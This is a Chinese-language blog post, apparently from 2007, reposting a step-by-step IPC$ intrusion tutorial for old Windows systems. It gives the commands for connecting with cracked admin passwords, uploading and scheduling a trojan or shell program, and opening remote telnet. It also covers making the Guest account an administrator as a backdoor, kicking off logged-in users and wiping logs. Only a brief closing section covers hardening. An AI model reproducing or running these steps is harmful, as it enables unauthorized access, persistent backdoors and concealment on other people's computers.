gbk

          DOS入侵示例

          DOS入侵示例
          這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)

          1. C:">net use ""127.0.0.1"IPC$ "密碼" /user:"用戶名"

          一般用流光,通過掃描弱口令來得到,管理員帳號和密碼.

          2. C:">copy srv.exe ""127.0.0.1"admin$

          先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:"winnt"system32",大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什么地方去了)。



          3. C:">net time ""127.0.0.1

          查查時間,發現127.0.0.1 的當前時間是 2004/6/15 上午 11:00,命令成功完成。



          4. C:">at ""127.0.0.1 11:05 srv.exe

          用at命令啟動srv.exe吧

          5. C:">net time ""127.0.0.1

          再查查到時間沒有?如果127.0.0.1 的當前時間是 2004/6/15 上午 11:05,那就準備開始下面的命令。



          6. C:">telnet 127.0.0.1 99

          這里會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。

          雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了



          7.C:">copy ntlm.exe ""127.0.0.1"admin$

          用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。



          8. C:"WINNT"system32>ntlm

          輸入ntlm啟動(這里的C:"WINNT"system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然后使用"net start telnet"來開啟Telnet服務!

          9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈)

          為了以防萬一,我們再把guest激活加到管理組

          10. C:">net user guest /active:yes

          將對方的Guest用戶激活

          11. C:">net user guest 1234

          將Guest的密碼改為1234,或者你要設定的密碼

          12. C:">net localgroup administrators guest /add

          將Guest變為Administrator(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計算

          13.使用nb2的sql工具。遠程執行dos命令

          net start telnet 開telnet服務

          net user mint mint /add 添加用戶mint密碼為mint

          net localgroup administrators mint /add 將帳號mint升級為管理員

          7,使用3389登陸。發現登陸用戶已滿。不用怕。我們把他踢出去。

          8,telnet對方ip。發現需要NTLM 身份驗證。怎么辦?放棄不是黑客的追求。

          9,我們在自己的電腦里建立一個帳號mint密碼為mint身份為管理員。

          10,找到c:"winnt"system32"cmd.exe 建立一個快捷方式到桌面。

          11,修改cmd的快捷方式屬性為允許其他身份登陸。

          12,然后運行桌面上的cmd.exe的快捷方式。輸入帳號mint密碼mint

          13,telnet對方ip.直接可以登陸對方電腦了。

          使用命令

          c:"query user 查看對方目前終端登陸狀況。

          運行命令

          c:"logoff 1 踢出去一個管理者

          再用c:"query user檢查一便~~

          ok了

          14,使用3389遠程終端登陸。

          入侵中可能會用到的相關命令

          請注意命令適用于本地還是遠程,如果適用于本地,你只能在獲得遠程主機的shell后,才能向遠程主機執行。

          1 建立空連接:

          net use ""IP"ipc$ "" /user:""

          2 建立非空連接:

          net use ""IP"ipc$ "psw" /user:"account"

          3 查看遠程主機的共享資源(但看不到默認共享)

          net view ""IP

          4 查看本地主機的共享資源(可以看到本地的默認共享)

          net share

          5 得到遠程主機的用戶名列表

          nbtstat -A IP

          6 得到本地主機的用戶列表

          net user

          7 查看遠程主機的當前時間

          net time ""IP

          8 顯示本地主機當前服務

          net start

          9 啟動/關閉本地服務

          net start 服務名 /y

          net stop 服務名 /y

          10 映射遠程共享:

          net use z: ""IP"baby

          此命令將共享名為baby的共享資源映射到z盤

          11 刪除共享映射

          net use c: /del 刪除映射的c盤,其他盤類推

          net use * /del /y刪除全部

          12 向遠程主機復制文件

          copy "路徑"srv.exe ""IP"共享目錄名,如:

          copy ccbirds.exe ""*.*.*.*"c 即將當前目錄下的文件復制到對方c盤內

          13 遠程添加計劃任務

          at ""ip 時間 程序名,如:

          at ""127.0.0.0 11:00 love.exe

          注意:時間盡量使用24小時制;在系統默認搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑

          14 開啟遠程主機的telnet

          這里要用到一個小程序:opentelnet.exe,各大下載站點都有,而且還需要滿足四個要求:

          1)目標開啟了ipc$共享

          2)你要擁有管理員密碼和帳號

          3)目標開啟RemoteRegistry服務,用戶就該ntlm認證

          4)對WIN2K/XP有效,NT未經測試

          命令格式:OpenTelnet.exe ""server account psw NTLM認證方式 port

          試例如下:c:">OpenTelnet.exe ""*.*.*.* administrator "" 1 90

          15 激活用戶/加入管理員組

          1 net uesr account /active:yes

          2 net localgroup administrators account /add

          16 關閉遠程主機的telnet

          同樣需要一個小程序:ResumeTelnet.exe

          命令格式:ResumeTelnet.exe ""server account psw

          試例如下:c:">ResumeTelnet.exe ""*.*.*.* administrator ""

          17 刪除一個已建立的ipc$連接

          net use ""IP"ipc$ /del

          (本教程不定期更新,欲獲得最新版本,請登陸官方網站:菜菜鳥社區原創http://ccbirds.yeah.net)

          十二 ipc$完整入侵步驟祥解

          其實入侵步驟隨個人愛好有所不同,我就說一下常見的吧,呵呵,獻丑了!

          1 用掃描軟件搜尋存在若口令的主機,比如流光,SSS,X-scan等,隨你的便,然后鎖定目標,如果掃到了管理員權限的口令,你可以進行下面的步驟了,假設你現在得到了administrator的密碼為空

          2 此時您有兩條路可以選擇:要么給對方開telnet(命令行),要么給它傳木馬(圖形界面),那我們就先走telnet這條路吧

          3上面開telnet的命令沒忘吧,要用到opentelnet這個小程序

          c:">OpenTelnet.exe ""192.168.21.* administrator "" 1 90

          如果返回如下信息

          *******************************************************

          Remote Telnet Configure, by refdom

          Email: refdom@263.net

          OpenTelnet.exe

          UsagepenTelnet.exe ""server username password NTLMAuthor telnetport

          *******************************************************

          Connecting ""192.168.21.*...Successfully!

          NOTICE!!!!!!

          The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

          Starting telnet service...

          telnet service is started successfully! telnet service is running!

          BINGLE!!!Yeah!!

          Telnet Port is 90. You can try:"telnet ip 90", to connect the server!

          Disconnecting server...Successfully!

          *說明你已經打開了一個端口90的telnet。

          4 現在我們telnet上去

          telnet 192.168.21.* 90

          如果成功,你將獲得遠程主機的一個shell,此時你可以像控制自己的機器一樣控制你的肉雞了,那么做點什么呢?把guest激活再加入管理組吧,就算留個后門了

          5 C:">net user guest /active:yes

          *將Guest用戶激活,也有可能人家的guest本來就試活的,你可以用net user guest看一下它的帳戶啟用的值是yes還是no

          6 C:">net user guest 1234

          *將Guest的密碼改為1234,或者改成你喜歡的密碼

          7 C:">net localgroup administrators guest /add

          *將Guest變為Administrator,這樣,即使以后管理員更改了他的密碼,我們也可以用guest登錄了,不過也要提醒您,因為通過安全 策略的設置,可以禁止guest等帳戶的遠程訪問,呵呵,如果真是這樣,那我們的后門也就白做了,愿上帝保佑Guest。

          8 好了,現在我們來走另一條路,給它傳個木馬玩玩

          9 首先,我們先建立起ipc$連接

          C:">net use ""192.168.21.*"ipc$ "" /user:administrator

          10 既然要上傳東西,就要先知道它開了什么共享

          C:">net view ""192.168.21.*

          在 ""192.168.21.*的共享資源

          資源共享名 類型 用途 注釋

          -----------------------------------------------------------

          C Disk

          D Disk

          命令成功完成。

          *好了,我們看到對方共享了C,D兩個盤,我們下面就可以向任意一個盤復制文件了。再次聲明,因為用net view命令無法看到默認共享,因此通過上面返回的結果,我們并不能判斷對方是否開啟了默認共享。

          11 C:">copy love.exe ""192.168.21.*"c

          已復制 1 個文件

          *用這個命令你可以將木馬客戶端love.exe傳到對方的c盤下,當然,如果能復制到系統文件夾下是最好的了,不容易被發現

          12 運行木馬前,我們先看看它現在的時間

          net time ""192.168.21.*

          ""192.168.21.*的當前時間是 2003/8/22 上午 11:00

          命令成功完成

          13 現在我們用at運行它吧,不過對方一定要開了Task Scheduler服務(允許程序在指定時間運行),否則就不行了

          C:">at ""192.168.21.* 11:02 c:"love.exe

          新加了一項作業,其作業 ID = 1

          14 剩下就是等了,等過了11:02,你就可以用控制端去連接了,如果成功你將可以用圖形界面去控制遠程主機了,如果連接失敗,那么它可能在局域網里,也可能程序被防火墻殺了,還可能它下線了(沒這么巧吧),無論哪種情況你只好放棄了

          嗯,好了,兩種基本方法都講了。如果你對上面的操作已經輕車熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec執行木馬,用命 令:psexec ""tergetIP -u user -p paswd cmd.exe直接獲得shell等,這些都是可以得,隨你的便。不過最后不要忘了把日志清理干凈,可以用榕哥的elsave.exe。

          講了ipc$的入侵,就不能不說如何防范,那么具體要怎樣做呢?看下面

          1,怎樣建立空連接,它有什么用?

          答:使用命令 net use "IPipc$ "" /user:"" 就可以簡單地和目標建立一個空連接(需要目標開放ipc$)。

          對于NT,在默認安全設置下,借助空連接可以列舉目標用戶、共享,訪問everyone權限的共享,訪問小部分注冊表等,沒有什么利用價值。對2000作用就更小了。而且實現也不方便,需借助工具。

          2.為什么我連不上IPC$?

          答:1.只有nt/2000/xp及以上系統才可以建立ipc$。如果你用的是98/me是沒有該功能的。

          2.確認你的命令沒有打錯。正確的命令是: net use "目標IPipc$ "密碼" /user:"用戶名"

          注意別多了或少了空格。當用戶名和密碼中不包含空格時兩邊的雙引號可以省略。空密碼用""表示。

          3,根據返回的錯誤號分析原因:

          錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員權限的,先提升權限;

          錯誤號51,Windows 無法找到網絡路徑 : 網絡有問題;

          錯誤號53,找不到網絡路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火墻(端口過濾);

          錯誤號67,找不到網絡名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;

          錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。

          錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;

          錯誤號1792,試圖登錄,但是網絡登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)

          錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。

          4,關于ipc$連不上的問題比較復雜,沒有總結出一個統一的認識,在肉雞上實驗有時會得出矛盾的結論,十分棘手。 而且知道了問題所在,如果沒有用其他辦法獲得shell,很多問題依然不能解決。

          5,怎樣打開目標的IPC$?

          答:首先你需要獲得一個不依賴于ipc$的shell,比如sql的cmd擴展、telnet、木馬。當然,這shell必須是admin權限的。然 后你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上一問題可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎么做的請看net命令的用 法)。還是不行的話(比如有防火墻,殺不了)建議放棄。

          6,怎樣映射和訪問默認共享?

          答:使用命令 net use z: "目標IPc$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤,其他盤類推。

          如果已經和目標建立了ipc$,則可以直接用IP加盤符加$訪問。比如 copy muma.exe "IPd$pathmuma.exe 。或者再R射也可以,只是不用用戶名和密碼了:net use y: "IPd$ 。然后 copy muma.exe y:pathmuma.exe 。當路徑中包含空格時,須用""將路徑全引住。

          7,如何刪除映射和ipc$連接?

          答:用命令 net use "IPipc$ /del 刪除和一個目標的ipc$連接。

          用命令 net use z: /del 刪除映射的z盤,其他盤類推。

          用命令 net use * /del 刪除全部。會有提示要求按y確認。

          8,連上ipc$然后我能做什么?

          答:能使用管理員權限的帳號成功和目標連接ipc$,表示你可以和對方系統做深入“交流”了。你可以使用各種命令行方式的工具(比如pstools系 列、Win2000SrvReskit、telnethack等)獲得目標信息、管理目標的進程和服務等。如果目標開放了默認共享(沒開你就幫他開),你 就可以上傳木馬并運行。也可以用tftp、ftp的辦法上傳。像dwrcc、VNC、RemoteAdmin等工具(木馬)還具有直接控屏的功能。如果是 2000server,還可以考慮開啟終端服務方便控制。這里提到的工具的使用,請看自帶的說明或相關教程。

          9,怎樣防止別人用ips$和默認共享入侵我?

          答:A、一種辦法是把ipc$和默認共享都刪除了。但重起后還會有。這就需要改注冊表。

          1,先把已有的刪除

          net share ipc$ /del

          net share admin$ /del

          net share c$ /del

          …………(有幾個刪幾個)

          2,禁止別人空連接

          首先運行regedit,找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的鍵值改為:00000002。

          3,禁止自動打開默認共享

          對于server版,找到如下主鍵 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters] 把AutoShareServer(DWORD)的鍵值改為:00000000。

          對于pro版,則是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的鍵值改為:00000000。

          如果上面所說的主鍵不存在,就新建一個再改鍵值。

          B、另一種是關閉ipc$和默認共享依賴的服務(不推薦)

          net stop lanmanserver

          可能會有提示說,XXX服務也會關閉是否繼續。因為還有些次要的服務依賴于lanmanserver。一般情況按y繼續就可以了。

          C、最簡單的辦法是設置復雜密碼,防止通過ipc$窮舉密碼。但如果你有其他漏洞,ipc$將為進一步入侵提供方便。

          D、還有一個辦法就是裝防火墻,或者端口過濾。

          結束進程:ntsd -c q -p PID

          posted on 2007-12-23 11:20 百科 閱讀(155) 評論(0)  編輯  收藏


          只有注冊用戶登錄后才能發表評論。


          網站導航:
           

          My Links

          Blog Stats

          常用鏈接

          留言簿(2)

          隨筆檔案

          文章檔案

          搜索

          最新評論

          閱讀排行榜

          評論排行榜

          主站蜘蛛池模板: 侯马市| 八宿县| 盐亭县| 陈巴尔虎旗| 绥芬河市| 白河县| 临颍县| 宿松县| 平顶山市| 青龙| 科技| 定州市| 安徽省| 丹阳市| 永春县| 博野县| 昌黎县| 岢岚县| 南溪县| 柞水县| 遂川县| 天津市| 于田县| 理塘县| 浙江省| 镇康县| 林甸县| 长武县| 长沙市| 泊头市| 聊城市| 库尔勒市| 宁乡县| 普定县| 山东| 伊宁县| 崇文区| 称多县| 松阳县| 柳河县| 辽阳市|